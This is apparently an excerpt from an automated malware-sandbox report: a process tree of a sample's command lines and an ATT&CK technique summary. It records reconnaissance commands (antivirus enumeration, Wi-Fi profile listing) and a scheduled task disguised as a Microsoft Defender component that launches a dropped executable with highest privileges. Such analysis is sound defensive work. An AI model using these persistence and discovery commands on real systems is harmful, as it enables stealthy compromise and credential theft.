        "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption

      C:\Windows\system32\NETSTAT.EXE  (PID 1664)
        "C:\Windows\system32\NETSTAT.EXE" -ano
        - System Network Connections Discovery
        - Gathers network information

      C:\Windows\System32\Wbem\WMIC.exe  (PID 4356)
        "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe

      C:\Windows\system32\ipconfig.exe  (PID 5720)
        "C:\Windows\system32\ipconfig.exe" /all
        - Gathers network information

      C:\Windows\system32\ROUTE.EXE  (PID 5612)
        "C:\Windows\system32\ROUTE.EXE" print

      C:\Windows\system32\ARP.EXE  (PID 3900)
        "C:\Windows\system32\ARP.EXE" -a
        - Network Service Discovery

      C:\Windows\system32\netsh.exe  (PID 4732)
        "C:\Windows\system32\netsh.exe" wlan show profile
        - Event Triggered Execution: Netsh Helper DLL
        - System Network Configuration Discovery: Wi-Fi Discovery

    C:\Windows\system32\schtasks.exe  (PID 3348)
      schtasks.exe /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr C:\Users\Admin\AppData\Roaming\DisplayDriverUpdater.exe /rl HIGHEST
      - Scheduled Task/Job: Scheduled Task
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe  (PID 5348)
  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Windows\system32\svchost.exe  (PID 800)
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe  (PID 4404)
  "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx

C:\Windows\System32\rundll32.exe  (PID 1884)
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (2)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Persistence
- Account Manipulation (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Privilege Escalation
- Account Manipulation (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Defense Evasion
- Hide Artifacts (1)
  - Hidden Files and Directories (1)
- Impair Defenses (1)
  - Disable or Modify System Firewall (1)
- Modify Registry (1)
- Subvert Trust Controls (2)
  - Install Root Certificate (1)
  - SIP and Trust Provider Hijacking (1)
Credential Access
- Credentials from Password Stores (1)
  - Credentials from Web Browsers (1)
- Unsecured Credentials (2)
  - Credentials In Files (2)
Discovery
- Browser Information Discovery (1)
- Network Service Discovery (1)
- Permission Groups Discovery (1)
  - Local Groups (1)
- Query Registry (2)
- System Information Discovery (2)
- System Network Configuration Discovery (1)
  - Wi-Fi Discovery (1)
- System Network Connections Discovery (1)
Downloads